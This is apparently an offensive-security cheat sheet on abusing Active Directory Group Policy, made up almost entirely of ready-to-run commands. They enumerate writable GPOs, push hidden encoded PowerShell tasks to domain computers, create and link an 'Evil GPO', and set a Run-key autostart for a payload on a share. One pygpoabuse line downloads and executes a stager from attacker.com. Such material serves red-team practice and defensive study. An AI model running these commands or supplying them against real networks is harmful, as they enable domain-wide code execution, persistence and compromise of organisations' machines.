Force GPO update on all domain computers:
Copy PS > Get-ADComputer -Filter * | % {Invoke-GPUpdate -Computer $_.name -Force -RandomDelayInMinutes 0}
Hunt for GPOs
List all GPOs in the domain:
Copy PS > .\SharpView.exe Get-DomainGPO -Properties displayName
List GPOs applied to a specifiec domain user or computer:
Copy PS > .\SharpView.exe Get-DomainGPO -UserIdentity snovvcrash -Properties DisplayName
PS > .\SharpView.exe Get-DomainGPO -ComputerIdentity WS01 -Properties DisplayName
Or
Cmd > gpresult /r /user snovvcrash [/h gpos-snovvcrash.html]
Cmd > gpresult /r /s WS01 [/h gpos-ws01.html]
Search for writable GPOs for the Domain Users
security group:
Copy PV3 > Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq ((Get-DomainGroup "Domain Users" | select objectSid).objectSid)}
PV3 > Get-DomainGPO '{<GPO_GUID>}'
Or
PS > Get-GPO -Guid <GPO_GUID>
Permissions Abuse
Recon
Show all GPOs in the domain:
Copy PV3 > Get-NetGPO -Domain megacorp.local | select cn,displayname
Search for GPOs that are controlled by the MEGACORP\PolicyAdmins
group:
Copy PV3 > Get-NetGPO | % {Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "MEGACORP\PolicyAdmins"}
List computers that are affected by vulnerable (modifiable) GPO:
Copy PV3 > Get-NetOU -GUID "00ff00ff-00ff-00ff-00ff-00ff00ff00ff" | % {Get-NetComputer -ADsPath $_}
Note: if I list all OUs affected by this GPO with PowerView, there will be no domain shown (like in BloodHound), but in Group Policy Manager we can see that it is presented.
Check if computer settings are enabled for this GPO (and enable them if not):
Copy PS > Get-Gpo VULN.GPO.NAME
PS > Set-GpoStatus VULN.GPO.NAME -Status AllSettingsEnabled
List users that can create a GPO and link it to a specific OU:
Copy PV3 > Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=megacorp,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -match "CreateChild" } | select objectDN,securityIdentifier | fl
PV3 > Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select objectDN,securityIdentifier | fl
Immediate Scheduled Tasks
GPOImmediateTask
Create a task with a PowerShell payload:
Copy $ echo 'sc -path "c:\\windows\\temp\\poc.txt" -value "GPO Abuse PoC..."' | iconv -t UTF-16LE | base64 -w0; echo
cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=
PS > New-GPOImmediateTask -TaskName Pentest -GPODisplayName VULN.GPO.NAME -CommandArguments '-NoP -NonI -W Hidden -Enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=' -Force
Clean up:
Copy PS > New-GPOImmediateTask -GPODisplayName VULN.GPO.NAME -Remove -Force
Check when GP was last applied:
GPOwned + pyGPOAbuse
Get target GPO ID:
Copy $ python3 GPOwned.py -u snovvcrash -p 'Passw0rd!' -d megacorp.local -dc-ip 192.168.1.11 -gpcmachine -listgpo
Create an immediate scheduled task:
Copy $ python3 pygpoabuse.py megacorp.local/snovvcrash:'Passw0rd!' -gpo-id <GPO_ID> -dc-ip 192.168.1.11 -v -command -powershell '(New-Object Net.WebClient).DownloadFile("https://attacker.com/stager.exe", "C:\Windows\Temp\stager.exe"); if ($?) {C:\Windows\Temp\stager.exe}'
GPPrefRegistryValue
Check if GPMC is installed and if it's not, install it as a Windows Feature (requires elevation):
Copy PS > Get-Module -List -Name GroupPolicy | select -expand ExportedCommands
PS > Install-WindowsFeature –Name GPMC
Create an evil GPO and link it to the target OU (will be visible in the management console):
Copy PS > New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=megacorp,DC=local"
Locate a writable network share:
Copy PV3 > Find-DomainShare -CheckShareAccess
Prepare your payload, put it to the network share and create an autorun value in the evil GPO to run the payload on boot/logon:
Copy PS > Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min /c \\srv01\SoftwareShare\evil.exe" -Type ExpandString
WMI Filters
GPO Abuse via NTLM Relay
Tools
Last updated 11 months ago